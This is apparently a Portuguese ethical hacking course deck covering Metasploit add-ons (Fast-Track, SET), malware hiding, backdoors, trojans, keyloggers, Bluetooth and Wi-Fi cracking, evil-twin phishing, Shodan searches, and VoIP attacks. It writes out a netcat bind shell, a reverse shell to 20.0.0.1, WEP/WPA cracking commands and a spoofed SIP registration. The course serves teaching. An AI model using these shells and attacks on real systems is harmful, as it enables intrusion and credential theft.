Fast-Track Foi criado como um complemento para o Metasploit. Permite automatizar exploração (autopwn), realizar ataques ao lado cliente, executar SQL injection e diversas outras tarefas. Possui um modo gráfico e console. Utilizaremos somente o segundo modo. Para acessá-lo basta digitar ./fast-track.py -i

Fast-Track – Menu principal

Fast-Track - Atualização

Fast-Track - Autopwn

A opção autopwn seleciona automaticamente diversos tipos de exploits e os utiliza contra o alvo, aumentando a chance da exploração ser bem sucedida. Entretanto, o autopwn é mais fácil de detectar por um sistema de IDS.

Fast-Track – NMAP Engine

Fast-Track SQL Inject

Fast-Track – SQL Inject

Fast-Track Mass Client Attack

Fast-Track – Exploits diversos

Fast-Track Binary to Hex

Fast-Track – Payload Generator

SET (Social Engineering Tool)

Também foi criado como um complemento para o Metasploit. Consegue criar modelos falsos de websites, enviar e-mail em massa, criar phishing, gerar documentos com falhas, criar um ataque Wireless e muito mais.

Para iniciar acesse o diretório /pentest/exploits/set e digite o comando: ./set

SET – Menu principal

SET – Menu Engenharia Social

SET – Spear Phishing

SET – Mass E-mailer

SET - WebAttack

SET – Ataque autorun USB/CD

SET – Create payload and listener

SET – Java Applet Attack

SET – Ataques equipamentos Arduino

SET – Wireless Fake AP Attack

Vulnerabilidades de Malware

Definição

Malicious SoftwareOrigemObjetivosMalwares passivosMalwares ativosRisco

Métodos de Infecção dos Malwares

E-mail

SimplesRápidoConfiávelContatosFake mailPhishing

Messengers

MSNICQGoogleTalkConfiabilidadeMenor desconfiançaEficiência

Código móvel

ActiveXJavascriptVBScriptSites maliciososNavegador

desatualizado

Falhas

Buffer overflowsElevação de

privilégiosSQL InjectionXSS

Mídia de armazenamento

CDDVDPen-DriveAutorunCuriosidadeMenor

desconfiança

Métodos de Ocultamento

Binders

Juntar programasJogo + backdoorExecução

programadaAlteração do

registroSenna SpyWordpad

Steganografia

Método eficienteBurla proteçõesImagensMP3BináriosEspaçamento

Edição/remoção de recursos binários

Permite “mudar” a estrutura binária de um malware, dificultando detecção por AVs

Edição hexadecimal

Permite “mudar” certas strings em um software, tentando com isto dificultar a detecção por AVs

Ocultamento do Firewall

Proteção “cara-crachá” Filtro de pacotes

- Spoofing- Porta de origem- Conexão reversa

Sandbox- DLL injection

Personal Firewall killing (processo)

Tunneling- HTTP (proxy)- ICMP (ping)- DNS

Ocultamento do IDS

AssinaturaComportamentoFragmentaçãoTunelamentoCriptografia

Ocultamento do Anti-Virus

Assinatura Edição recursos Editor Hexa Compressão

do executável Polimorfismo de

código

Alternate Data Streams

Permite criar “camadas” de dados adicionais em sistemas NTFS

Exemplo: texto.txt:virus.exe Pode ser aberto com o

comando start. Ex:

start c:\teste\texto.txt:oculto.txt

Backdoors

Definição

Porta dos fundos

Easter EggSenhasModificação

de serviços originais

Criação de novo serviço

NetCat

Muito conhecidoCanivete SuiçoCryptoCatClienteServiço localConexão

reversa

Netcat – Conexão diretaEste método é relativamente o mais simples, mas também o mais facilmente detectado e impedido. O atacante já precisa possuir acesso prévio ao sistema que deseja infectar. Ele então roda o Netcat no sistema alvo, abrindo uma porta TCP e anexando um processo de shell a ela.

O seguinte comando por exemplo funcionaria em sistemas Windows:

nc –L –p 100 –e cmd.exe –vv

A opção –d poderia ser utilizada para “esconder” o processo da console.

Basta agora o atacante se conectar via telnet ou nc na porta 100 do sistema infectado.

Netcat – Conexão direta

Netcat – Conexão reversa•Nesse método o “atacante” será o servidor. O cliente inicia a conexão.

• Ele deverá abrir duas portas com o Netcat, usando quaisquer números. Tudo o que for digitado pelo cliente na primeira porta, será processado pelo shell através do pipe e mostrado como resultado na segunda porta.

• Usando engenharia social ou outro método, força-se o cliente a se conectar às duas portas com telnet (ou o próprio NetCat, mais recomendado no caso do Windows)

• Exemplo:

Vamos supor que abri as portas 79 e 53, ambas TCP, no meu sistema. Meu endereço IP é 20.0.0.1 e agora preciso que a “vítima” digite os comandos para se conectar em mim. Exemplo:

telnet 20.0.0.1 79 | /bin/sh | telnet 20.0.0.1 53 (para sistemas Linux-like)

Nc 20.0.0.1 79 | cmd.exe | telnet 20.0.0.1 53 (para sistemas Windows)

Netcat – Conexão reversa

Tunelamento ICMP - Loki

Tunelamento ICMPICMP_ECHOICMP_ECHOREPLYLokiLokid

Tunelamento ICMP - ICMPCMD

Proof of concept

Sistemas Windows

Usa apenas o “ping” para se comunicar

Tunelamento HTTP - Reverse WWW Backdoor

The Hackers Choice

“Placing Backdoors througt Firewalls”

Proof of ConceptTunelamentoHTTPProxy

Cavalos de Tróia

Definição

ObjetivoTróiaBindersWindowsPrimeira geraçãoSegunda geraçãoTerceira geração

Back Orifice

Cult of dead cow1997Primeira geraçãoWindows 9xConexão comumSem opção de

alertaPlug-ins

Netbus

Carl Frederik1998Primeira geraçãoWindows 9x e NTConexão comumAlerta por e-mailSem plug-ins

SubSeven 2.1

2000Segunda geraçãoWindows 9x e NTConexão comumAlerta por e-mail,

ICQ e IRCPlug-insScanner remoto

Beast2003Terceira GeraçãoConexão comum e

reversaKeyloggerScreenloggerDLL InjectionFirewall killing

Beast realizando conexão reversa

Poison Ivy

2005Terceira

GeraçãoConexão

comum e reversa

TunelamentoCriptografiaWebcamFarejamento

remoto

Dark Comet 2010 Quarta geração Possui várias

novidades como:

- Suporte a dns dinâmico (no ip)- Diferentes tipos de tunelamento- Cliente/server FTP- Novos métodos de ocultamento do server- Etc

Rootkits

Definição“Kit do root”PropagaçãoEsconde

informações vitaisNível de AplicaçãoNível de BibliotecaNível de KernelNível de

Virtualização

Hacker Defender

2002HxDefMorphineBaseado em

kernelArquivosProcessosPastasConexões

AFX Rootkit2005APIs do WindowsBaseado em

bibliotecaProcessosServiçosConexõesÍconesArquivos

Zero Access Rootkit

2011 Kernel mode

rootkit Infecta sistemas

de 32 e 64 bits Usa falhas web

(browser, java, flash) como principal método de propagação

Keyloggers

Definição de Keylogger

Captura do teclado

InterrupçãoMensagensKeyloggers

locaisKeyloggers com

envio remotoKeyloggers

físicosMarcos Flávio Araújo Assunção

Home Keylogger

LocalSimplesFácil utilizaçãoNão é detectadoGrava em um

arquivo de texto comum

Spy Lantern Keylogger

RemotoComercialDetectadoCriptografiaE-mail

Keylogger físico

Necessita acesso Físico

Versões PS2 e USB

Senha para acesso ao conteúdo

Versão com suporte a wi-fi

Screenloggers

Definição

ScreenshotsVisualRemotoIdeal para captura

de teclados virtuais

Muito utilizado em vírus do tipo “Banker”

Perfect Keylogger

BlazingToolsComercialGrava shots

no discoEnvia shots

por e-mailInstalação

remota

Ardamax Keylogger

ComercialWebUpdateE-mailLANFTP

Vulnerabilidades de BlueTooth

Ataques a Bluetooth

War-Snipping BlueJacking BlueSnarfing BlueBugging BlueSniper Denial of Service

War-Snipping

Para descobrir dispositivos

Envia dados aleatórios(lixo) visando uma resposta qualquer do dispositivo

Permite detectar a maior parte dos dispositivos conhecidos

BlueJacking

Também chamado de BlueSpamming

Envia um VCard para outro dispositivo

No campo de identificação do nome, substitui pela mensagem

Usado para BlueDating e BlueChat

BlueSnarfing

Roubo de informações do dispositivo

Contatos, calendário

Calendário Problemas no

protocolo OBEX (get invés de push vcard)

Dispositivos mais antigos

BlueBugging

Permite acesso a comandos do celular

Mais poderoso que o BlueSnarfing

Permite fazer chamadas, enviar SMS e até ouvir conversas alheias.

Geralmente utiliza um laptop

BlueSniper

O BlueTooth é realmente limitado a uma comunicação de 100 metros?

BlueSniper

Permite encontrar dispositivos Bluetooth a 1 Km de distância!

Vulnerabilidades de Wi-Fi

Redes 802.11 (Wi-Fi)

• Princípios• Frequências:2.4GHz / 5 GHz• Canais e interferência• ESSID e BSSID• DS (Sistema de Distribuição)• IBSS ou AD-HOC• BSS• ESS

BSS (Basic Service)

• Associação“Conectar-se” ao Access Point

• AutenticaçãoOSA (Open System Authentication)SKA (Shared Key – WEP)PSK (WPA Personal - Pre-Shared Key)802.1X (WPA Enterprise – Radius)

ESS (Extended Service)• Desassociação

“Desconectar-se” de um AP e “reconectar” em outro em um ESS. Iniciado normalmente pela estação.

• DesautenticaçãoDesautenticar uma estação wi-fi. Automaticamente ela também é desassociada. Iniciado pelo AP.

Elementos de Segurança Wi-Fi• Criptografia

WEP, WEP2, WEP DinâmicoWPA, WPA2

• AutenticaçãoOSA, Shared Key (WEP), WPA-PSK, WPA-Enterprise (802.1X)

• Rede invisível (ESSID oculto)

• Filtro de endereços MAC

• WIDS / WIPS (Wireless IntrusionPrevention System).

• Outros (VLAN, proteção contra ARPno AP, etc).

Ataques à redes Wireless

Ataques à Infra-estrutura: Negação de Serviço (DoS) Burlando filtros de MAC WarDriving (detecção passiva/ativa)

Ataques de criptoanálise/força-bruta: Decriptação de IVS no WEP (Wep Cracking) Bruteforce em handhshakes WPA

Ataques ao usuário Wi-Fi: Rogue Access Point Evil Twin Ataque MITM com DNS Spoofing

WarDriving – Detectando e mapeando redes Wi-Fi

Wardriving

Mapeamento de redes wirelessUsado como método de descoberta passiva de redes

Tecnicamento envolve o uso de um automóvel para gravar informações wireless sobre uma larga àrea

Warflying utilizam aviões ao invés de automóveis

Wardriving em si não é uma atividade ilegal

Usar o sinal de rádio para se conectar a redes sem a permissão do dono é ilegal

Hardware para o wardriving

Hardware para o Wardriving

Computadores móveis Notebook/tablets Smartphones

Interface de rede Wireless Possui diversas formas e estilos

Formato USB Placa PCI Placa PCMCIA Cartão CompactFlash (CF)

Antenas Anexando uma antena externa irá aumentar

muito o alcance da descoberta das redes wireless

Características fundamentais Se a frequência aumenta o comprimento de onda

diminui. Se o ganho da antena aumenta a àrea de cobertura

diminui

Antenas (continuação) Categorias básicas

Omni-direcional• Detecta igualmente sinais de todas as direções

Semi-direcional• Foca em uma direção específica

Direcional• Envia o sinal em uma direção bem definida

(ângulo bem fechado)

Antena e NIC sugeridos

Antena e NIC de 58dbi e 8000mw Modelo: EDUP EP-MS8515GSChipset: Ralink 3070L e Realtek 187LAlcance do sinal: + de 5 KM

Softwares para o wardriving

Aplicações open-source Kismet

Roda em sistemas Linux (existe porte para Windows) Pode reportar dados similares ao NetStumbler Também suporta GPS Pode capturar pacotes e salvá-los em um arquivo

airodump-ng Possui quase todos os recursos do Kismet (menos o

GPS). Permite integração com outras ferramentas da suíte NG.

WarDriving - Kismet

WarDriving – airodump-ng

Denial of Service (Recusa de serviço) em redes Wi-Fi

Ataques Denial of Service (DoS)

Ataques DoS no Wireless Negam o acesso de dispositivos wi-fi ao AP Categorias

Ataques da camada física Ataques da camada de enlace (MAC)

Ataques da camada física Inunda o espectro com interferência

eletromagnética Para prevenir ao dispositivo de se comunicar com o

DoS Camada física

DoS Camada de Enlace (MAC)

Filtro de MAC e Redes ocultas

Aplicando Filtro de MAC

Trocando o MAC da estação

Filtro de MAC “burlado”

Ocultando uma rede para protegê-la

Detectando redes ocultasMesmo que uma rede esteja oculta podemos detectar sua presença ao monitorar os probes dos dispositivos clientes no Wireshark. Isso só é possível no modo de monitoração

com a interface mon0.

O que é exatamente este “Modo de Monitoração”?

Modo de Monitoração

Neste modo (RFMON) podemos monitorar o tráfego das redes wi-fi sem precisarmos nos

associar à elas. Utilitário: airmon-ngMarcos Flávio Araújo Assunção

Descobrindo APs e estações com Airodump

Permite monitorar redes wireless e capturar pacotes para serem analisados posteriormente. Consegue detectar Access Points em qualquer canal, mesmo estando “invisíveis”. Detecta também estações Wi-Fi associadas ou tentando se associar. Ou seja, as máquinas dos usuários serão detectadas.

Fundamentos e ataques a WEP

Ataques à criptografia: WEPAs vulnerabilidades são baseadas em como o

WEP e a cifra RC4 são implementadosWEP só pode utilizar uma chave de 64 ou 128

bits Vetor de inicialização(IV) de 24 bits e uma chave

padrão de 40 ou 104 bits Tamanho relativamente pequeno da chave limita a

sua força

Implementação do WEP cria um padrão que pode ser detectado por atacantes IVs são números de 24 bits IVs começam a se repetir em menos de sete horas

Vulnerabilidades do WEP

Implementação do WEP cria um padrão que pode ser detectado por atacantes (continuação) Alguns sistemas wireless sempre começam

com o mesmo IVColisão

Dois pacotes criptografados com o mesmo IVAtaque de dedução de chave

Determina a chave através da análise de dois pacotes que se colidiram (mesmo IV)

WEP Hacking –Airodump

Primeiramente, usamos o airodump-ng para filtrar todas as redes com criptografia WEP disponíveis. No examplo acima selecionaremos a rede com o ESSID

carol para realizar o ataque.

airodump-ng --encrypt wep mon0

WEP Hacking - Airodump

Na primeira imagem, rodamos o airodump-ng na interface mon0 filtrando: canal 11, bssid do AP da rede carol e

salvando o resultado para o arquivo chaveWEP. Veja o resultado na segunda imagem.

Agora, teremos que esperar. O campo “Data” deve capturar milhares de pacotes IVS para que seja possível realizar a

decoficação. Tem como acelerar o processo?

WEP Hacking - Aireplay

Utilizando o aireplay-ng nós realizamos o ataque caffe-latte que pede aos dispositivos conectados à rede carol que nos enviem mais pacotes IVS. Com isso veja que temos mais de 40000 pacotes no campo #Data. É mais que suficiente para quebrar uma chave de 64 bits WEP.

WEP Hacking - Aircrack

Executamos o aircrack-ng com o nome do arquivo que foi capturado pelo airodump-ng. Veja que o número de IVS já chegava a 71406. Com isso a chave foi rapidamente quebrada. A chave utilizada é porco.

Descriptografando os pacotes capturados

O airdecap-ng é um utilitário que consegue descriptografar todo o tráfego armazenado em um arquivo PCAP, bastando fornecer a chave WEP ou WPA descoberta previamente. Assim, o atacante poderá utilizar o Wireshark para visualizar os dados que já foram capturados.

Fundamentos e ataques a WPA

Acesso Protegido Wi-Fi (WPA)

Padrão do 802.11i que cuida tanto da criptografia quanto da autenticação

Temporal Key Integrity Protocol (TKIP) Chaves TKIP são conhecidas como “chave por

pacote” TKIP dinâmicamente gera uma nova chave para

cada pacote criado Previne colisões

Que era justamente uma das fraquezas principais do WEP

Acesso Protegido Wi-Fi (WPA)

Autenticação WPA Cumprida por usar tanto o padrão IEEE 802.1x ou

tecnologia de chave previamente compartilhada (PSK)

A autenticação PSK usa uma frase para gerar a chave de criptografia. Funciona como uma senha. A frase deve ser previamente inserida em cada Access

Point e dispositivo Wireless. Serve como seed para gerar matematicamente as

chaves de criptografia

WPA foi elaborado para resolver as vulnerabilidades do WEP com um mínimo de inconveniência

Acesso Protegido Wi-Fi 2 (WPA2)

Segunda geração da segurança WPAUsa o Advanced Encryption Standard

(AES) para criptografia dos dados Suporta autenticação IEEE 802.1x ou

tecnologia PSKWPA2 permite que ambas as tecnologias

AES e TKIP operem na mesma rede WLAN

Configurando WPA no Roteador

WPA Hacking – Airodump

Assim como fizemos com o WEP, vamos filtrar no airodump-ng todas as redes que utilizem criptografia WPA e WPA2 com o comando: airodump-ng –encrypt wpa mon0

Vamos escolher a rede com o ESSID EmpresaX para realizar o ataque.

WPA Hacking – Airodump

Também da mesma forma filtraremos no airodump-ng: canal 6, o bssid da rede EmpresaX e salvaremos o resultado no arquivo chaveWPA. Tudo isso deve ser feito na interface mon0. Comando:

airodump-ng –c 6 –bssid 50:CC:F8:85:ED:B2 –w chaveWPA mon0

O próximo passo é capturar o handshake do WPA. Isso só é possível quando algum cliente se conectar na rede. Podemos acelerar esse processo deautenticando os usuários com o aireplay

WPA Hacking – Aireplay

Utilizamos no aireplay o MAC do AP (-a) e o MAC do cliente (-c) que foi detectado no airodump. Enviamos 5 pacotes de desassociação .

Verifique no airodump que o WPA Handshake foi capturado.

Handshake WPA

Verifique no airodump que o WPA Handshake foi capturado. O que fazer com isto? Entra agora o processo de força-bruta.

WPA Hacking – Aircrack-ng

Primeiramente, ao contrário do WEP, precisamos ter uma wordlist (lista de palavras) para tentar realizar a força-bruta no handshake WPA que foi capturado. Uma rainbow table pode ser usada para acelerar o processo.

O BackTrack Linux já possui uma lista gigantesca no arquivo /pentest/passwords/wordlists/rockyou.txt (mais de 100 MB)

Aircrack – Força-Bruta na chave

A chave foi descoberta. É nossoprecioso

WPS – Wireless Protected Setup

WPA Hacking – WPS PIN Hacking

O PIN foi configurado para o Wi-Fi Protected

Setup. Ele é 94154016.Marcos Flávio Araújo Assunção

No exemplo da imagem anterior eu pedi o wash para usar a interface mon0 e ignorar erros de frame check sequence (fcs). Ele encontrou a minha rede defhack e outra que também usa WPS.

WPA Hacking – WPS PIN HackingVamos executar como exemplo o Reaver "travando" em um determinado canal (opções -f e -c 6), modo verbose (-vv) e usando o bssid do meu Access Point (-b):

A partir deste momento o reaver irá tentar centenas de combinações até descobrir o pin.

Rogue AP e Evil Twin – As piores ameaças contra redes sem fio Wi-Fi

Ataques diretos através de Rogue APs e

Evil TwinAccess Point ilegítimo (Rogue AP)

AP instalado por um funcionário Sem a aprovação ou supervisão da equipe de TI

Está dentro da companhia e possui um ESSID diferente

Evil Twin (fake AP) É um AP que imita o ESSID de uma rede wi-fi

real. Visa enganar e confundir os clientes para que se conectem ao mesmo. Normalmente está fora do ambiente físico da empresa.

Rogue APs e Evil Twin

Rogue AP – Airbase-ng

O utilitário Airbase-ng permite “iniciar” um Access Point via software (softAP). Isso pode facilmente ser usado em conjunto com uma rede cabeada para criar um Rogue AP.

(Lembre: Rogue AP não é um Evil Twin, ESSIDs diferentes)

Perceba que o airbase-ng cria uma interface at0 .

Rogue AP – Visão do cliente

O cliente enxerga a rede Faculdade e tenta se conectar à ela. Vamos ver se a conexão foi efetuada com sucesso.

Evil Twin – Servidor DHCP

Um Evil Twin pode ser configurado para fornecer endereço IP aos clientes que se conectarem ao nosso access point.

Evil Twin – Desautenticando clientes originais

Vamos desconectar os clientes da rede original. Iremos executar o aireplay-ng com --deauth em broadcast para toda a rede

Evil Twin – Cliente recebendo IP do DHCP

Perceba que o cliente pegou um endereço IP do nosso servidor DHCP. Isso significa que ele se conectou com sucesso à interface at0 criada pelo airbase-ng

Evil Twin – Capturar o handshake WPA utilizando apenas a estação cliente

Evil Twin – WPA Hacking

Perceba no exemplo da imagem anterior que o airbase-ng levantou o Access Point utilizando o ESSID da rede defhack, o BSSID do AP real, a criptografia WPA TKIP (-z 2) e verbose (-v) para gerar mais informações úteis para debug.

Evil Twin – WPA Handshake

Capturamos o Handshake utilizando apenas o cliente, sem necessidade nem de ter o Access Point real por perto. Agora basta quebrar com o Aircrack-NG.

Eficiência dos ataques de “força-bruta” da chave

Na maioria dos casos, uma chave com uma complexidade muito alta pode levar meses.

Mas e se houver outra forma?E se eu puder simplesmente... “pedir a

chave”?

Evil Twin – Criar um Honeypot utilizando o airbase-ng, DNS Spoofing e Apache ou SET

Evil Twin – DNSSPOOF e Apache

Usando os comandos mostrados realizamos:- Iniciamos o dns spoof na interface at0 (dnsspoof –i at0)- Iniciamos o Apache (apache2ctl start)

Evil Twin - Apache

Veja que qualquer site que o cliente abrir será direcionando para o nosso servidor Apache. Como poderíamos substituir essa página?

Evil Twin – Apache com MySQL

Evil Twin – Social Engineering Toolkit

Selecionamos o ataque no SET e escolhemos o Gmail como template. Importante: o airbase-ng e o dnsspoof devem continuar rodando em janelas separadas.

Evil Twin – Página falsa do SET

Evil Twin – Capturando credenciais no SET

Evil Twin – Criando uma ponte

Podemos criar uma bridge entre a interface at0 do AP falso e uma interface de rede ethernet (ou outra interface Wireless). Assim o cliente poderá usar a Internet.

Evil Twin - Wireshark

Com o Wireshark, capturamos o tráfego de Internet do usuário

Evil Twin com FreeRadius – WPA Enterprise

Evil Twin com FreeRadius

Usando asleap para força-bruta no hash

Uso de um WIDS/WIPS contra Evil Twins

• Wireless Intrusion Detection/Prevention System (WIDS/WIPS)- Realiza proteção ativa/passiva de

uma rede wi-fi.

- Atua contra injeção de pacotes ARP, captura de handshakes WEP/WPA e auxilia na detecção de Rogue APs

- Protege contra Evil Twins desassociando as estações desses APs malignos.

Multipot

• São vários Evil Twins criados com o airbase-ng, cada um com um MAC (BSSID) diferente.

• Isso permite aumentar a concorrência entre o AP real e os falsos.

• Inutiliza a “proteção” do WIPS contra Evil Twins.

Multipot (Múltiplos Evil Twins)

Uma antena com maior ganho (maior dBi) será decisiva na escolha do Sistema Operacional do cliente pelo AP correto.

Indo além – Ataques ainda mais avançados

• FakeAuth = Autenticação WEP sem precisar descobrir a chave

• DNS Tunneling = Permite navegar em APs “abertos” (OSA) burlando totalmente a autenticação via browser.

• Evil Twin + Metasploit = Permite explorar falhas no computador alheio, comprometendo totalmente o sistema.

• Multipot + Deauth + DNS Spoofing + Bridge + Ettercap/SSL Strip= Apocalypse!

Contra-medidas para os problemas e ataques apresentados em Wi-Fi

Como se proteger então?

• Utilizar WPA2-Enterprise com client-side certificates e múltiplas camadas de autenticação.

• Implementar um WIPS com diversos sensores espalhados pelo ambiente

• Implementar um HIDS (Host-based IDS) para que os ataques de desautenticação sejam impedidos a nível de host.

• Definir VLANs, filtros de acesso MAC e ocultar a rede• Usar criptografia nos protocolos e serviços de camadas

superiores. Ex: IPSEC, SSL, etc.• Realizar Penetration Tests• Localizar e remover o Rogue AP e o Evil Twin

“É impossível estar totalmente seguro. O segredo é: dificultar tanto a vida de um possível atacante de modo que o investimento para invadir a rede seja maior que a motivação para fazê-lo”

Localizar Rogue AP - Trilateração

Ekahau HeatMapper

Não serve para localizar um Evil Twin

Localizar Evil Twin - GPSD

Usando o gpsd (gps daemon) para inicializar o GPS USB. É necessário

fazê-lo antes de abrir o Kismet Marcos Flávio Araújo Assunção

Localizar Evil Twin – Kismet + GPS

Acima, os dados de localização capturados pelo GPS.

Localizar Evil Twin - Giskismet

O Giskismet está exportando os dados gerados para o Kismet para um

formato que pode ser aberto no Google Maps/Earth.

Localizar Evil Twin – Google Maps

Dados de localização dos Access Points

Localizou Evil Twin? Pega rex!

SHODAN HQ

Varredura – Um processo barulhento e necessárioO NMAP é sinônimo de varredura e descoberta de

máquinas e serviços em uma rede.

Entretanto, com a utilização cada vez maior de firewalls e IDS o processo de varredura tem perdido um pouco de sua eficácia, e pode ser facilmente detectado.

A solução? Sair da varredura manual e utilizar um bot especializado para encontrar dispositivos. Podemos fazer isso de forma fácil através do SHODAN HQ.

IntroduçãoShodan HQ é um projeto que visa criar um buscador que

identifique qualquer dispositivo conectado à Internet.

Além de encontrar o dispositivo, Shodan é capaz de descobrir o sistema operacional, as portas abertas e muito mais sobre ele.

www.shodan.iowww.shodanhq.com

Shodan HQ

Serviços oferecidos pelo Shodan

O Shodan oferece serviços gratuitos e pagos. É recomendável criar uma conta gratuita (pode ser integrada com o facebook) para a utilização de alguns termos mais avançados de pesquisa.

Entre os serviços pagos está a possibilidade do uso de mapas integrados com a varredura. Esses mapas mostram onde está fisicamente localizado o dispositivo que você encontrou.

Mapa dos dispositivos encontrados

Mapa de dispositivos mundial

Termos de pesquisaEntre os comandos que podemos utilizar para uma pesquisa, estão:

country -> paíscity -> cidadeport -> porta geo -> coordenadas geográficasnet -> Sub-rede os -> Sistema operacionalhostname -> Nome de hostbefore -> Antesafter -> depois

A sintaxe usada é: comando:argumento

Paíscountry:br

Cidadecity:”BeloHorizonte”

Portaport:22

Geo-Localizaçãogeo:0,-1

Faixa de rede:net:200.10.1.0/24

Sistema Operacional:os:”windows xp”

Nome de hosthostname:”gov.br”

before:01/01/2014

after:01/09/2014

Combinando comandos de pesquisa

Utilizar os comandos de forma individual já leva a resultados bem interessantes.

Entretanto, se quisermos nos aprofundar na pesquisa podemos combinar os comandos da maneira que desejarmos.

Somente a sua imaginação é o limite: quaisquer comandos podem ser misturados.

Servidores SMB (netbios) no Brasil

Servidores Apache em Belo Horizonte

Sistemas com o nome gvt nas coordenadas

Sistema na rede 200.195.16.0/24 com a porta 8080

Sistemas Windows XP com hostname atm

Sistemas brasileiros descobertos entre 01/07 e 08/09

O que pesquisar?Para descobrir equipamentos interessantes, pesquise coisas como:

- Fabricante (ex: Cisco)- Modelo do dispositivo (ex: WRT54G)- “default password”- “basic authentication”- Nome da empresa (ex: Microsoft)- Domínio (ex: gvt.net.br)

O que pesquisar?

E após descobrir os sistemas?A versão paga do Shodan permite uso de plugins para integração com diversas ferramentas – inclusive Metasploit.

Aba Exploits - Shodan

Scanhub – Integração com NMAP

Vulnerabilidades de Voz sobre IP (VoIP)

- VoIP é um conjunto de tecnologias que permite quechamadas de voz sejam feitas através da internet

- Possibilita realização de chamadas de baixo custo, ou até mesmo gratuitas.

- Redução de custos com infra-estrutura.

- Acrescenta novas funcionalidades ao serviço telefônico

Vulnerabilidades do VOIP

Protocolos

Protocolos de Sinalização

Responsáveis por iniciar, monitorar, modificar e terminarchamadas VoIP.

- SIP (Session Intitation Protocol ) - RFC 3261- SDP (Session Description Protocol) – RFC 4566- MGCP (Media Gateway Control Protocol) – RFC 3435- Megaco / H.248 – RFC 3525

Protocolos

Protocolos de Mídia

Responsáveis por transportar o fluxo de mídia (Voz ou imagens)

- RTP (Real Time Protocol ) - RFC 3261- RTCP (Real Time Control Protocol) – RFC 3605- SRTP / ZRTP

Protocolos

Codecs

Realizam a compressão do fluxo de mídia de forma que possa ser otimizada a banda.

- G.711 (64 kbit/s )- GSM (12.2 kbit/s)- G.729 (8 kbit/s)- G.723 (6.3 kbit/s)

SIP (Session Initiation Protocol)

- Protocolo de sessão mais utilizado dentro da tecnologiaVoIP

- Arquitetura baseada no modelo de cliente-servidor onde os clientes iniciam uma chamada e o servidor responde às chamadas.

- Protocolo baseado em texto e se assemelha com o HTTP

- mensagens SIP são compostas de requisições e respostas especificas

Elementos da arquitetura SIP

- User agents (UA)- Proxy Server- Registration Server- Redirect Server- Location Server

Call Flow / SIP

Ameaças – Modelo em camada

Ameaças

- Invite Flood

- Registration Hijacking

- Escuta Telefônica

- Fuzzing

- SPIT

Camada 6 – Aplicações e Dados Voip

- INVITE = Mensagem usada para iniciar uma chamada

- Consiste em enviar milhares de mensagens invite com algumasmodificações na mensagem (From, To, invalid IP, invalid Domain, etc...)

- Como o SIP utiliza (na maioria dos casos) o UDP é fácil gerar pacotes com origem spoofed.

INVITE sip:UserB@biloxi.com SIP/2.0Via: SIP/2.0/TCP client.atlanta.com:5060;branch=z9hG4bK74bf9Max-Forwards: 70From: BigGuy <sip:UserA@atlanta.com>;tag=9fxced76slTo: LittleGuy <sip:UserB@biloxi.com>Call-ID: 3848276298220188511@atlanta.comCSeq: 1 INVITEContact: <sip:UserA@client.atlanta.com;transport=tcp>Content-Type: application/sdpContent-Length: 143

Invite Flood

- IAX Flooder- INVITE Flooder- RTP Flooder- SIPSak (SIP swiss army knife)

Invite Flood - Ferramentas

Registration HijackingREGISTER Mensagem usada para registrar um usuário em um servidor sip

UA leva de 1800 a 3600 ms para se registrar

Consiste em:

- substituir o registro de um usuário legítimo por um falso

- remover o registro de um usuário válido

- Usado como base para ataques de MITM.

Exemplo Registration Hijack

REGISTER sip: sip.my_proxy.com:5060 SIP/2.0Via: SIP/2.0/UDP 192.168.1.56:5060From: <sip:0987654321@sip.my_proxy.com>;tag=0002-0000-D2C784D6To: <sip:0987654321@sip.my_proxy.com>Call-ID: rE0x0001-0001-65C2F446-99@AAE2A42DF82D1D0AACSeq: 500646445 REGISTERContact: <sip:654321@192.168.1.101:5060>Expires: 1800User-Agent: VEGA400/10.02.07.2xS009Content-Length: 0

REGISTER sip: sip.my_proxy.com:5060 SIP/2.0Via: SIP/2.0/UDP 192.168.1.56:5060From: <sip:0987654321@sip.my_proxy.com>;tag=0002-0000-D2C784D6To: <sip:0987654321@sip.my_proxy.com>Call-ID: rE0x0001-0001-65C2F446-99@AAE2A42DF82D1D0AACSeq: 500646445 REGISTERContact: <sip:654321@192.168.1.56:5060>Expires: 1800User-Agent: VEGA400/10.02.07.2xS009Content-Length: 0

Registro normal

Registro hijacked

Registration Hijacking - Ferramentas

Registration Adder

Registration Eraser

Registration Hijacker

Reghijacker

Fareja o tráfego e decodifica os pacotes

Usa técnicas como ARP Poisoning

Softwares: Cain, WireShark, DTMF Decoder

Call Eaversdropping - Escuta

Escuta – Salvando conversas

Escuta – Detectando Dígitos

Fuzzing

É um método para encontrar erros e vulnerabilidades,através da criação de diferentes tipos de pacotesdirecionados para o protocolo que se deseja testar, levando as especificações do protocolo ao seu ponto de quebra.

Resultados obtidos:

- Buffer Overflows- Format String Vulnerability- Integer Overflow- Endless Loops and Logic Errors

Fuzzing - Exemplo

INVITE sip:UserB@biloxi.com SIP/2.0Via: SIP/2.0/TCP client.atlanta.com:5060;branch=z9hG4bK74bf9Max-Forwards: 70From: BigGuy<sip:UserA@atlanta.comZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ>;tag=9fxced76slTo: LittleGuy <sip:UserB@biloxi.com>Call-ID: 3848276298220188511@atlanta.comCSeq: 1 INVITEContact: <sip:UserA@client.atlanta.com;transport=tcp>Content-Type: application/sdpContent-Length: 143

Fuzzing - Ferramentas

- Asteroid- Fuzzy Packet-Interstate Fuzzer- ohrwurm- PROTOS H.323 Fuzzer- PROTOS SIP Fuzzer- SIP Test Framework (SFTF)- Sip-Proxy

SPIT (Spam Over Internet Telephony)

Geração, automatizada, de chamadas não solicitadas

Não é possível deletar a chamada (como fazemos comSPAM)

Ferramentas:- Spitter- TeleYapper

Esteganografia em fluxos RTP

“Esteganografia é o estudo e uso de técnicas para ocultar uma mensagem dentro da outra”

Métodos de proteção - VOIP

- Utilização de TCP/TLS

- Segmentação com VLAN

- Utilização de Autenticação emSIP

- Encriptação de Mídia(ZRTP/SRTP)

- Diminuição do tempo de registro (evita hijacking)

- Gerenciamento de Identidades(RFC4474)

Uso de Honeypots em Uso de Honeypots em Ethical HackingEthical Hacking

Definição de Honeypot

Honeypot significa “pote de mel”

